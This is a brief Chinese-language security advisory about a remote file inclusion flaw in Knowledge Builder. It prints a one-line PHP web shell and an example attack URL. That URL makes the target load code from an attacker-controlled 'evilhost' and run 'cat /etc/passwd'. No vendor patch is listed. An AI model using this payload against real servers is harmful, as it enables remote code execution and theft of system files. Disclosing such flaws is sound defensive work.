涉及程序：
Knowledge Builder

描述：
Knowledge Builder存在远程代码执行缺陷

详细：
Knowledge Builder是一款合成反应数据库程序。Knowledge Builder程序存在缺陷，攻击者通过在WEB服务器上创建下列文件：
<?
system($cmd);
?>
并利用攻击者精心制作的下列格式的URL访问目标服务器时，能在安装Knowledge Builder程序的远程目标系统上以当前系统的权限执行任意代码:
http://targethost/kb/index.php?page=http://evilhost/index&cmd=cat%20/etc/passwd

攻击方法：
示例代码：
http://targethost/kb/index.php?page=http://evilhost/index&cmd=cat%20/etc/passwd

解决方案：
目前厂商未公布该缺陷补丁，请用户及时关注厂商站点：
http://www.activecampaign.com/kb/
附加信息：
无